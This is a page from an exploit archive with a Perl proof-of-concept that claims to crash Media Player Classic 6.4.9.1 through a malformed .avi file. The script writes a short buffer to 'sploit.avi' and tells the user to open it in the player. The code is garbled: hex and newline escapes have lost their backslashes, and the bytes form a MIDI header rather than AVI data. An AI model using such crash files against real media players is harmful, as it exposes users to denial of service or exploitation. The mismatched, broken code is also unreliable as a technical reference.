[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Media Player Classic v6.4.9.1 (.avi) Buffer Overflow Exploit
# Published : 2010-02-22
# Author : cr4wl3r
# Previous Title : VKPlayer 1.0 (.mid) Denial of Service Exploit
# Next Title : GOM Player v2.1.21.4846 (.wav) Buffer Overflow Exploit
#!/usr/bin/perl
# Media Player Classic 6.4.9.1 (.avi) Buffer Overflow Exploit
# Homepage: http://www.sourceforge.net/projects/guliverkli2/
# Exploit Coded by: cr4wl3r <cr4wl3rx40linuxmailx2Eorg>
# From: Indonesia
#
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# WARNING - WARNING - WARNING - WARNING
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
#
#
# Disclaimer: The author published the information under the condition
# that is not in the intention of the reader to use them in order to bring
# to himself or others a profit or to bring to others damage.
#
#
# Gr33tz: No Thanks
print "
[+]--------------------------------------------------------------[+]
[+] Media Player Classic 6.4.9.1 (.avi) Buffer Overflow Exploit [+]
[+] By : cr4wl3r [+]
[+]--------------------------------------------------------------[+]
";
$buff = "x4Dx54x68x64x00x00x00x06x00x00x00x00x00x00";
open(file, "> sploit.avi");
print (file $buff);
print "nn[+] Done!n
[+] Open with Media Player Classicn
[+] Coded by cr4wl3rn";